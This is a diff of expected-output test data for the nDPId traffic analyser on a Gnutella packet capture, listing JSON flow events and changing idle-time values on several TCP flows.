00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82060,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.217.132.111","src_port":28681,"dst_port":25394,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82060,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.217.132.111","src_port":28681,"dst_port":25394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85608,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85608,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85608,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85608,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493286,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.38.9.82","src_port":28681,"dst_port":24223,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493286,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.38.9.82","src_port":28681,"dst_port":24223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":490660,"flow_last_seen":552092,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -4135,18 +4135,18 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":253025,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.68.45.203","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82062,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.196.58","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82062,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.196.58","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.128.217.128","src_port":50200,"dst_port":45194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.128.217.128","src_port":50200,"dst_port":45194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.128.217.128","src_port":50200,"dst_port":45194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.128.217.128","src_port":50200,"dst_port":45194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551881,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.110.61.169","src_port":28681,"dst_port":11973,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551881,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.110.61.169","src_port":28681,"dst_port":11973,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65063,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65063,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65063,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65063,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431830,"flow_last_seen":431830,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.75.43.182","src_port":28681,"dst_port":43502,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431830,"flow_last_seen":431830,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.75.43.182","src_port":28681,"dst_port":43502,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.18.172.208","src_port":50241,"dst_port":63172,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.18.172.208","src_port":50241,"dst_port":63172,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90747,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90747,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.18.172.208","src_port":50241,"dst_port":63172,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.18.172.208","src_port":50241,"dst_port":63172,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90747,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90747,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":490939,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.17.132.18","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":490939,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.17.132.18","src_port":28681,"dst_port":23458,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":72851,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.224.95.97","src_port":28681,"dst_port":46356,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -4155,28 +4155,28 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":72850,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.50.179","src_port":28681,"dst_port":29411,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.134.167.82","src_port":28681,"dst_port":5820,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.134.167.82","src_port":28681,"dst_port":5820,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70170,"flow_last_seen":79200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":50238,"dst_port":59144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70170,"flow_last_seen":79200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":50238,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68109,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":50229,"dst_port":64920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68109,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":50229,"dst_port":64920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70170,"flow_last_seen":79200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":50238,"dst_port":59144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70170,"flow_last_seen":79200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":50238,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 